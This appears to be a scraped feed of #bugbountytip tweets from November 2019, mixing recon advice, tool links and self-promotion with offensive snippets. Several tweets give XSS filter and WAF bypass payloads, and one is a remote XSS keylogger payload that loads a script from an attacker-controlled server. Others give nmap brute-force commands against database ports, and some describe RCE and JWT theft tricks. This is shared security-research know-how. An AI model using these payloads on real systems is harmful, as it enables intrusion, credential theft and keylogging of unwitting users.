2019-11-17 02:38:05
0 #bugbountytip Always try to access the localStorage when you get an XSS vulnerability. Just managed to retrieve the JWT tokens and user PII information stored on localStorage.
Gillis Jones
@Gillis57


2019-11-17 00:29:13
0 #bugbountytip If you're using a shared environment, and see someone else's injections are messing up the environment for other testers- take the 5 minutes necessary to try to clean up after the other tester that don't respect you enough to do the same.
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-11-16 23:00:56
6 -1-Recon Everything.pdf: https://t.co/mRJV7fnMQg -2-Open Source Web Reconnaissance with Recon-ng.pdf: https://t.co/V1mV1NNzTB -3-12 OSINT Resources For E-mail Addresses.pdf: https://t.co/EgR3LoHoAm -4-OSINT.pdf: https://t.co/wDNvAWXATu #OSINT #bugbountytip #redteam #Pentesting
tololovejoi
@tolo7010


2019-11-16 20:55:10
3 Bug bounty is not possible if there is no publicly disclosed reports at @Hacker0x01 #bugbounty #bugbountytip #infosec #hacking
healthyoutlet
@healthyoutlet


2019-11-16 19:27:50
0 If you're writing cli tools that people will be using in bash, consider sending all your banners and verbose output to stderr so that the main output can be cleanly piped into other tools. In python you can use sys.stderr.write() #bugbountytip
swordfish
@swordfi96641916


2019-11-16 19:05:46
0 Response: Cannot GET / .. tried all the HTTP Request headers. Any tips on what's next? #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-16 18:41:28
0 site:"https://t.co/XdC6eMbugO" pdf -- High level information disclosure !!! User's phone numbers, addresses .... #bugbountytips #bugbountytip https://t.co/7qG4z5s7CZ
bugbountytip
@a_l_e_r_t_1_


2019-11-16 18:37:12
1 Less than 1$...(Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/Dq4zebkM4o
Berk Bulan
@berk_bulan


2019-11-16 14:56:09
0 Dns Zone Transfer script #BugBounty #bugbountytip #bugbountytips https://t.co/aKUoARVYQ7
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-16 14:32:21
0 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/nbOwGUl1dF
Hussein Daher
@HusseiN98D


2019-11-16 12:42:59
9 To everyone who has been following me, you know I was taking a #bugbounty challenge: 30days $30k Started 20/10. Some bugs still unpaid. I've failed. Still 4 more days to go to complete but I'll be stopping here, I feel really tired. #bugbountytip #bugbountytips #infosec #pentest https://t.co/VRoYeMrxuo
Elsadat
@M0_SADAT


2019-11-16 10:57:28
0 ๐Ÿ‘‰๐Ÿฟ๐Ÿ‘‡๐Ÿฟ๐Ÿ‘‡๐Ÿฟ๐Ÿ‘‡๐Ÿฟ๐Ÿ‘‡๐Ÿฟ๐Ÿ‘‡๐Ÿฟ๐Ÿ‘‡๐Ÿฟ๐Ÿ‘‡๐Ÿฟ๐Ÿ‘‡๐Ÿฟ๐Ÿ‘‡๐Ÿฟ๐Ÿ‘ˆ๐Ÿฟ ๐Ÿ‘‰๐Ÿฟ๐Ÿ‘‡๐Ÿพ๐Ÿ‘‡๐Ÿพ๐Ÿ‘‡๐Ÿพ๐Ÿ‘‡๐Ÿพ๐Ÿ‘‡๐Ÿพ๐Ÿ‘‡๐Ÿพ๐Ÿ‘‡๐Ÿพ๐Ÿ‘‡๐Ÿพ๐Ÿ‘‡๐Ÿพ๐Ÿ‘ˆ๐Ÿฟ ๐Ÿ‘‰๐Ÿฟ๐Ÿ‘‰๐Ÿพ๐Ÿ‘‡๐Ÿฝ๐Ÿ‘‡๐Ÿฝ๐Ÿ‘‡๐Ÿฝ๐Ÿ‘‡๐Ÿฝ๐Ÿ‘‡๐Ÿฝ๐Ÿ‘‡๐Ÿฝ๐Ÿ‘‡๐Ÿฝ๐Ÿ‘ˆ๐Ÿพ๐Ÿ‘ˆ๐Ÿฟ ๐Ÿ‘‰๐Ÿฟ๐Ÿ‘‰๐Ÿพ๐Ÿ‘‰๐Ÿฝ๐Ÿ‘‡๐Ÿผ๐Ÿ‘‡๐Ÿผ๐Ÿ‘‡๐Ÿผ๐Ÿ‘‡๐Ÿผ๐Ÿ‘‡๐Ÿผ๐Ÿ‘ˆ๐Ÿฝ๐Ÿ‘ˆ๐Ÿพ๐Ÿ‘ˆ๐Ÿฟ ๐Ÿ‘‰๐Ÿฟ๐Ÿ‘‰๐Ÿพ๐Ÿ‘‰๐Ÿฝ๐Ÿ‘‰๐Ÿผ๐Ÿ‘‡๐Ÿป๐Ÿ‘‡๐Ÿป๐Ÿ‘‡๐Ÿป๐Ÿ‘ˆ๐Ÿผ๐Ÿ‘ˆ๐Ÿฝ๐Ÿ‘ˆ๐Ÿพ๐Ÿ‘ˆ๐Ÿฟ ๐Ÿ‘‰๐Ÿฟ๐Ÿ‘‰๐ŸพRead THE JS FILES๐Ÿ‘ˆ๐Ÿฝ๐Ÿ‘ˆ๐Ÿพ๐Ÿ‘ˆ๐Ÿฟ ๐Ÿ‘‰๐Ÿฟ๐Ÿ‘‰๐Ÿพ๐Ÿ‘‰๐Ÿฝ๐Ÿ‘‰๐Ÿผ๐Ÿ‘†๐Ÿป๐Ÿ‘†๐Ÿป๐Ÿ‘†๐Ÿป๐Ÿ‘ˆ๐Ÿผ๐Ÿ‘ˆ๐Ÿฝ๐Ÿ‘ˆ๐Ÿพ๐Ÿ‘ˆ๐Ÿฟ ๐Ÿ‘‰๐Ÿฟ๐Ÿ‘‰๐Ÿพ๐Ÿ‘‰๐Ÿฝ๐Ÿ‘†๐Ÿผ๐Ÿ‘†๐Ÿผ๐Ÿ‘†๐Ÿผ๐Ÿ‘†๐Ÿผ๐Ÿ‘†๐Ÿผ๐Ÿ‘ˆ๐Ÿฝ๐Ÿ‘ˆ๐Ÿพ๐Ÿ‘ˆ๐Ÿฟ ๐Ÿ‘‰๐Ÿฟ๐Ÿ‘‰๐Ÿพ๐Ÿ‘†๐Ÿฝ๐Ÿ‘†๐Ÿฝ๐Ÿ‘†๐Ÿฝ๐Ÿ‘†๐Ÿฝ๐Ÿ‘†๐Ÿฝ๐Ÿ‘†๐Ÿฝ๐Ÿ‘†๐Ÿฝ๐Ÿ‘ˆ๐Ÿพ๐Ÿ‘ˆ๐Ÿฟ ๐Ÿ‘‰๐Ÿฟ๐Ÿ‘†๐Ÿพ๐Ÿ‘†๐Ÿพ๐Ÿ‘†๐Ÿพ๐Ÿ‘†๐Ÿพ๐Ÿ‘†๐Ÿพ๐Ÿ‘†๐Ÿพ๐Ÿ‘†๐Ÿพ๐Ÿ‘†๐Ÿพ๐Ÿ‘†๐Ÿพ๐Ÿ‘ˆ๐Ÿฟ ๐Ÿ‘‰๐Ÿฟ๐Ÿ‘†๐Ÿฟ๐Ÿ‘†๐Ÿฟ๐Ÿ‘†๐Ÿฟ๐Ÿ‘†๐Ÿฟ๐Ÿ‘†๐Ÿฟ๐Ÿ‘†๐Ÿฟ๐Ÿ‘†๐Ÿฟ๐Ÿ‘†๐Ÿฟ๐Ÿ‘†๐Ÿฟ๐Ÿ‘ˆ๐Ÿฟ #bugbountytip
Zero Xyele
@zeroxyele


2019-11-16 08:19:05
3 Simple Python Script for Host Header Redirection Attack [Multithreaded] https://t.co/LIHgGibs5Z I was awarded 150$ in ten minutes by using that tool ๐Ÿ˜Ž #bugbounty #bugbountytip #bugbountytips #hackerone #hacker101
evryd4y
@evryd4y


2019-11-16 05:56:12
1 Handy for passive enum https://t.co/G8fYKfqLTG #bugbountytip
Ashish Kunwar
@D0rkerDevil


2019-11-16 02:07:43
0 @TakSec Param miner extension can find this. :) #bugbountytip
Gillis Jones
@Gillis57


2019-11-15 23:40:15
0 #bugbountytip If you're using a shared environment with other testers. The rules are very similar to hiking. #leavenotrace- leave the environment like you found it. If you leave damn injections all over the place rendering it unusable, you're an asshole.
Hussein Daher
@HusseiN98D


2019-11-15 20:43:37
2 So today I've found an SQLi in a cookie. Many people only stick to parameters. Test cookies too! #bugbounty #bugbountytips #bugbountytip
Sagar Tanur
@Sagarvd01


2019-11-15 15:50:12
1 Here's a write up of how I could've accessed sensitive PII and private data of tens of thousands of Indians. https://t.co/uby8wggKPx #bugbounty #bugbountytips #BugBountyTip #hacking #infosec #writeup
Halil AHMAD
@Halilahmadd


2019-11-15 15:33:54
0 XSS on a login page while stuck in an input tag with <> filtered. Final Payload: " formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src="" #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
bugbountytip
@a_l_e_r_t_1_


2019-11-15 13:55:48
1 Less than 1$... More than 5000 line. Everywhere... You dont need internet. Constantly updating... Learn & Hack & Earn https://t.co/fR7SA5JafD #bugbountytip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #bugbountytips https://t.co/np0PsJg3GY
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-11-15 12:38:47
8 -Brute forcing MySQL passwords: nmap -p3306 --script mysql-brute xx.xx.xx.xx -Brute forcing MS SQL passwords: nmap -p1433 --script ms-sql-brute xx.xx.xx.xx -Brute forcing Redis passwords: nmap -p6379 --script redis-brute xx.xx.xx.xx #nmap #hacking #Pentesting #BugBountyTip
Pascal S
@PascalSec


2019-11-15 12:22:39
0 [1/2] #BugBountyTip So this is a pretty basic one but I happen to forget about it over and over again. Before starting a new pentest engagement, clear all your cookies and browser cache. Happened to me many times before that I was asking myself what a specific cookie was for...
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-11-15 11:51:49
6 -XSS cheat sheet portswigge.pdf: https://t.co/lSCq9VHoYF -XSS via HTTP Headers.pdf: https://t.co/jiQJnioGwt -SQL Injection & XSS Playground.pdf: https://t.co/9QZCtkFcx7 -XSS Exploitation in DVWA (Bypass All Security).pdf: https://t.co/dzwO0TwHCF #bugbountytip #xss #Hacking
Elsadat
@M0_SADAT


2019-11-15 10:18:09
2 FinallyโœŒ๏ธAcknowledged by @BMW Security Team for 2019 after finding bug in the main domain ;) #bugbountytip ? 1-There is something left for you 2-Always try to Escalate everything you find! 3-NEVER GIVE UP HOF Link:https://t.co/RdsatALn39 (Ahmed Elsadat) #HOF #BugBounty #infosec https://t.co/otgetMsWC0
bugbountytip
@a_l_e_r_t_1_


2019-11-15 08:51:29
1 Less than 1$... More than 5000 line. Everywhere... You dont need internet. Constantly updating... Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/e5k6XeQeK2
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-11-15 02:35:29
7 -Top GitHub Dorks and Tools Used to Scan GitHub Repositories for Sensitive Data.pdf: https://t.co/hM7HIZM56f -Pentesting Cheatsheet.pdf: https://t.co/tGxEQsqiQO -Windows Userland Persistence Fundamentals.pdf: https://t.co/uB0pSeXDP3 #PenTest #OSINT #bugbountytip #Hacking #infosec
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-11-14 23:24:33
4 -XSS cheat sheet portswigge.pdf: https://t.co/lSCq9VHoYF -Top GitHub Dorks and Tools: https://t.co/hM7HIZM56f -Pentesting Cheatsheet: https://t.co/zFwYAhCAba -Pentesting Cheatsheet2.pdf: https://t.co/34YEhESX58 -Pentesting Cheatsheets.pdf: https://t.co/tGxEQsqiQO #BugBountyTip
Sagar Tanur
@Sagarvd01


2019-11-14 17:02:57
0 A write up on how I was able to take over 4 tabs in Facebook's own Facebook pages. https://t.co/gmwro4xl5T #bugbounty #bugbountytips #BugBountyTip #writeup @Hacker0x01 @Bugcrowd
yourXss
@yourXss


2019-11-14 16:20:00
0 RT @HusseiN98D: TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This revealโ€ฆ
YogoshaOfficial
@YogoshaOfficial


2019-11-14 13:33:08
7 [#Bugbountytip] ExpressJs runs on port 3000 , and if debug is on, then a lot of information can be disclosed exp : http[s]://example.com:3000/debug/pprof/heap?debug=1 Thanks @D0rkerDevil for this great tip ! Feel free to send us more #hackertips to share with the community
Ankit Thakur @bsidesahmedabad
@rudra16t


2019-11-14 09:00:01
1 Yeah looking forward to see you all at @bsidesahmedabad #bsidesahmedabad #infosec #bugbounty #BugBountyTip https://t.co/5HTiT8AQF2
Wh11teW0lf
@Wh11teW0lf


2019-11-14 06:54:48
0 #BugBountyTip Yesterday i found disclosure of AWS keys via /AWSconf.git/ folder instead of /.git/ folder
tololovejoi
@tolo7010


2019-11-14 06:42:39
0 Hacking doesn't take some times, it takes forever. #bugbounty #bugbountytip #bugbountytips #hacking
Evan Custodio
@defparam


2019-11-14 04:53:14
0 Gotta take breaks from hacking clear your mind. Stayed away from the computer last weekend and spent all Saturday plumbing in this sleek softener system with my buddy. Started recon again and filed 2 High/Crit HTTP Request Smuggling bugs today. Stay rested yโ€™all #BugBountyTip https://t.co/8GeWvj0YO9
.ฬถฬอ’อ„ฬ”อ„อฬฬฟอ„ฬฬอ€ฬˆฬ’ฬ‡ฬ‰ฬฝ Halil AHMAD .ฬถฬอ’อ„ฬ”อ„อฬฬฟอ„ฬฬอ€ฬˆ
@Halilahmadd


2019-11-14 04:37:17
3 CloudFlare XSS Bypass Payload: <a"/onclick=(confirm)()>Click Here! #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
yourXss
@yourXss


2019-11-14 04:10:00
0 RT @HusseiN98D: TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This revealโ€ฆ
bugbountytip
@a_l_e_r_t_1_


2019-11-13 23:51:28
0 Now again less than 1$ !!! (short time) (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/3eMttPxf6k
Alex Birsan
@alxbrsn


2019-11-13 20:21:12
0 #bugbountytip: Give some non-platform programs a try! No stats to worry about, no drama, no superfluous processes. Just you and the scope. https://t.co/dJRxMEekdO
Mourad
@SecuAudit


2019-11-13 17:51:56
0 Terrible Experience - Unfortunately with asian gaming companies at @Hacker0x01 programs , mostly they even don't answer msgs ... really not a very good experience . #bugbounty #BugBountyTip
Gwendal Le Coguic
@gwendallecoguic


2019-11-13 16:51:45
1 onliner to resolve the host of a given url #bugbountytip #tools #onliner host `echo $url|sed "s/.*:\/\///"|cut -d '/' -f 1|cut -d '@' -f 2|cut -d':' -f 1` https://t.co/DYokxgu5B4 https://t.co/ZnkGnGvBsy
yourXss
@yourXss


2019-11-13 16:00:00
3 TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RT๐Ÿ‘๏ธ
Hussein Daher
@HusseiN98D


2019-11-13 15:58:28
3 TimeForA #BugBountyTip I use https://t.co/TKsmKBnl8M to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RT๐Ÿ‘๏ธ
Noman | ู†ุนู…ุงู† | เคจเฅ‹เคฎเคพเคจ
@nomanAli181


2019-11-13 15:56:14
0 Took hours to turn this from 'possible' SQL Injection to finally exploit it coz It was Blind + webserver was blocking a bunch of chars. Learn SQL syntax coz sqlmap won't help/work in all cases ;) #bugbounty #bugbountytip https://t.co/B29DV9d0Bw
HackIsOn ยฎ
@hackison


2019-11-13 14:36:43
0 Credits: @erbbysam #bugbounty #bugbountytips #BugBountyTip https://t.co/zqGpyjfaWp
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-11-12 19:30:18
6 -Getting Started in BugBounty Hunting.pdf https://t.co/ZSTyAcvGQx -OSCP-Survival-Guide.pdf: https://t.co/bmTXPteO6m -TLS&SSL Penetration Testing.pdf: https://t.co/HsFlycdTAc -Evil Twin Attack:The Definitive Guide.pdf: https://t.co/IjzR0QaAJp #bugbountytip #hacking #Pentest #OSCP
bugbountytip
@a_l_e_r_t_1_


2019-11-12 18:50:47
1 Now less than 1$ (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Hussein Daher
@HusseiN98D


2019-11-12 17:20:38
22 Time for another #BugBountyTip : While testing file upload forms on IIS7 servers, you can get RCE by uploading ".cer" files if ".asp" extension is blacklisted. This already let me to multiple RCEs in #bugbounty and #pentest projects. #bugbountytips RT if you love! More coming ๐Ÿ‘๏ธ
.ฬถฬอ’อ„ฬ”อ„อฬฬฟอ„ฬฬอ€ฬˆฬ’ฬ‡ฬ‰ฬฝ Halil AHMAD .ฬถฬอ’อ„ฬ”อ„อฬฬฟอ„ฬฬอ€ฬˆ
@Halilahmadd


2019-11-12 13:42:22
2 Here is a nice Bootstrap vector that has recently been added to the XSS cheat sheet by <xss class=progress-bar-animated onanimationstart=alert(1)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
Yadhavi
@PrincessYadhavi


2019-11-12 12:37:25
0 somewhere i heard about a tool which can grep through burp saved files(sitemap -> right click,-> save selected items). i forgot the name. anyone know about? #bugbounty #bugbountytips #bugbountytip #burpsuite
Hussein Daher
@HusseiN98D


2019-11-12 11:17:30
4 CHEAP VPS UBUNTU SERVERS: I receive many messages asking where to get a cheap/good VPS for #bugbounty You can have a good server for as low as $2/month month by using my 50% discount code D98KTCA15Y on https://t.co/xl74Mwv0PB ! BTC payment supported #bugbountytips #bugbountytip
0day work
@0daywork


2019-11-12 00:57:50
0 #BugBountyTip Always check for #RaceConditions when redeeming coupons to get greater discounts and huge bounties ;-) #Bugbounty #OWASP #ITSecurity https://t.co/k3ZlbRmVBO
stoXe
@DevinStokes


2019-11-11 23:09:16
6 Remote XSS Keylogger: Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> This will log a user's input to your remote server. #BugBounty #BugBountyTip #XSS https://t.co/WvH30bUbyF
m0z
@LooseSecurity


2019-11-11 20:48:29
1 League of Bounties: Almost 600 members and growing! Ask your #BugBounty questions and get #bugbountytips from the top bug bounty hunters and whitehat hackers in the community. #BugBountyTip Joining our discord increases bug bounty luck by 15%. https://t.co/WTsdy7VJXI
Mourad
@SecuAudit


2019-11-11 20:22:33
0 i've accumulated more than 10 reports closed as informative this week , time to take a break relax and evaluate my pentesting approach #bugbountytips #BugBountyTip https://t.co/nnJ3KLJVYr
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-11 18:36:40
0 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/ITiMzEy1ED
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-11 18:35:46
5 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/ZTpv2Gq4ux
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-11 18:32:05
0 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/fzDOZJDHd6
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-11 18:30:38
1 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/jotHFAux1f
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-11 18:29:34
3 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/uNTTXRVKRA
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-11 18:28:36
0 Malware Alert !!! Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/jGlhtpTFpR
.ฬถฬอ’อ„ฬ”อ„อฬฬฟอ„ฬฬอ€ฬˆฬ’ฬ‡ฬ‰ฬฝ Halil AHMAD .ฬถฬอ’อ„ฬ”อ„อฬฬฟอ„ฬฬอ€ฬˆ
@Halilahmadd


2019-11-11 15:23:23
2 Here I want to share with you this magnificent. > Application bypass < <%0crameset%20src=''> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security https://t.co/nN7haNHr97
ALL ABOUT HACKER
@AboutHacking


2019-11-11 13:38:35
3 Understanding HTTP Headers and cookie. Read: https://t.co/ZcHq5v6Ri8 #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/W0zQT2sn9D
intigriti
@intigriti


2019-11-11 12:46:04
6 [email protected]'s #BugBountyTip: Check JSON responses for additional properties, and send them back! ๐Ÿ‘€#HackWithIntigriti https://t.co/qIwEXtV9S8
Henry Chen
@chybeta


2019-11-11 10:54:10
0 Apache Flink Dashboard -> upload a malicious JAR -> submit new job -> getshell #bugbounty #bugbountytips #BugBountyTip https://t.co/lWNNCXHvvt
bugbountytip
@a_l_e_r_t_1_


2019-11-11 10:11:42
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/AoovNBqGht
Brodie Codie
@brodie_codie


2019-11-10 22:45:20
0 Tip 1. Passive, Active scanning and enumeration Probe the target Gather as much information about the target as possible Short List of Tools i like (Amass, Assetfinder, Pdlist, Dnsrecon, Dig, Wafw00f, Masscan, Dirsearch ) What tools do you like? #bugbountytips #BugBountyTip
ghostlulz
@ghostlulz1337


2019-11-10 22:15:04
8 You have probably heard of Subdomain Hijacking(takeover) but what how Broken Link Hijacking? You can utilize this vulnerable to get some easy Stored XSS wins. More info on my blog: https://t.co/Up6LfsdBs7 #bugbounty #bugbountytip #bugbountytips #infosec #redteam #pentest #xss https://t.co/uKA4V3uOZZ
.ฬถฬอ’อ„ฬ”อ„อฬฬฟอ„ฬฬอ€ฬˆฬ’ฬ‡ฬ‰ฬฝ Halil AHMAD .ฬถฬอ’อ„ฬ”อ„อฬฬฟอ„ฬฬอ€ฬˆ
@Halilahmadd


2019-11-10 21:56:46
0 Bypass is required if you need to use quotes in some encodings where single and double quotes are blocked <IMG SRC=`javascript:alert(โ€œHalil?, โ€˜XSSโ€™โ€)`> #BugBounty #XSS #BugBountyTip #infosec #Bypass
.ฬถฬอ’อ„ฬ”อ„อฬฬฟอ„ฬฬอ€ฬˆฬ’ฬ‡ฬ‰ฬฝ Halil AHMAD .ฬถฬอ’อ„ฬ”อ„อฬฬฟอ„ฬฬอ€ฬˆ
@Halilahmadd


2019-11-10 21:55:46
0 Let's say they blocked the site with nail. What will we do? Here is the solution: <IMG SRC=javascript:alert("XSS")> #BugBounty #XSS #BugBountyTip #infosec #Bypass
bugbountytip
@a_l_e_r_t_1_


2019-11-10 21:03:44
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
0day work
@0daywork


2019-11-10 20:47:57
3 #BugbountyTip: Change request parameters from scalar (val=foo) to array (val[]=foo) for #XSS #Bugbounty #OWASP https://t.co/eVOBz8WtwT
Tannay Bagga
@BaggaTannay


2019-11-10 19:56:19
0 Getting my hands on docker for building #Recon tools.I must say it makes the installation task so hassle free!#bugbountytips #opensource #BugBountyTip #Docker
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-10 19:21:56
0 Mass RDP ATTACKS #BlueKeep Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/NTSGfnFBo5
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-10 18:49:55
2 Linux Commands for Bug Hunters and Hackers !! Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip https://t.co/GIgkZB5KK9
Nick || hunt4p1zza
@ngkogkos


2019-11-10 18:33:29
2 Sometimes login endpoints submit the password twice in POST data. If you need to perform a credentials guessing attack with Burp Suite: 1) Use Cluster bomb, 2) Use "Copy other payload" to copy from 1st password placeholder. See pictures. #burpsuitetip #bugbounty #bugbountytip https://t.co/pY7ga2bbsb
Nick || hunt4p1zza
@ngkogkos


2019-11-10 18:20:31
7 I've been testing newer versions of #ffuf by @joohoi. It's dope being able to fuzz for files w/ 100 threads at 350reqs/sec w/ nearly no failures/stability issues! If you need BOTH stability & speed, then #ffuf is the only tool you need for web fuzzing. #bugbounty #BugBountyTip https://t.co/bWhywAAvVx
Ismayil Tahmazov
@Tismayil1


2019-11-10 18:20:10
5 Sometimes we have to do the impossible. SQL'Injection Attempt from Remote Site With this method: XSS, SQL'i, CSRF attacks can be done. Failure to filter the data from the remote source leaves open doors for such attacks. #bugbountytips #BugBountyTip #bugbounty #whitehat https://t.co/bb29oBdpGL
Infected Drake
@0xInfection


2019-11-10 13:33:03
8 Hey folks, v2.1.1 of XSRFProbe is out! \o/ So whether you're stuck at an endpoint with forms in it or looking to learn about how cross site request forgeries (CSRF) work, give this toolkit a try. ๐Ÿ˜‰ https://t.co/OKUlxHNUO3 #infosec #appsec #bugbounty #bugbountytip https://t.co/5NMCR7YRMq
.ฬถฬอ’อ„ฬ”อ„อฬฬฟอ„ฬฬอ€ฬˆฬ’ฬ‡ฬ‰ฬฝ Halil AHMAD .ฬถฬอ’อ„ฬ”อ„อฬฬฟอ„ฬฬอ€ฬˆ
@Halilahmadd


2019-11-10 11:04:00
3 Indispensable xss bypass payload. ">'><details/open/ontoggle=confirm('XSS')> #BugBounty #XSS #BugBountyTip #infosec
bugbountytip
@a_l_e_r_t_1_


2019-11-10 08:26:32
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5ryR3 #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
ALL ABOUT HACKER
@AboutHacking


2019-11-10 07:35:08
0 Cross Site Scripting attack Basic to advance [ part 6] Read:https://t.co/H4hJHhsdO5 #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/HkDrjRxblY
Shantanu Kulkarni
@Iamshantanukul


2019-11-10 06:58:55
0 If u can determine which opn source packages r usd in d application u r attacking ,u can download these n perform a code review or install them to experiment on. vulnerability in any of these may be exploitable to compromise d wider application #BugBountyTip #bugcrowd #hackerone
Hussein Daher
@HusseiN98D


2019-11-10 00:02:37
15 Sharing one of my secrets #BugBountyTip When discovering subdomains/domains/assets owned by a company, use the Google Analytics ID to expand your attack surface. The ID is in the HTML code. Reverse search then: https://t.co/fkWSWj8GUn RT once this helps!#bugbountytips #infosec
ALL ABOUT HACKER
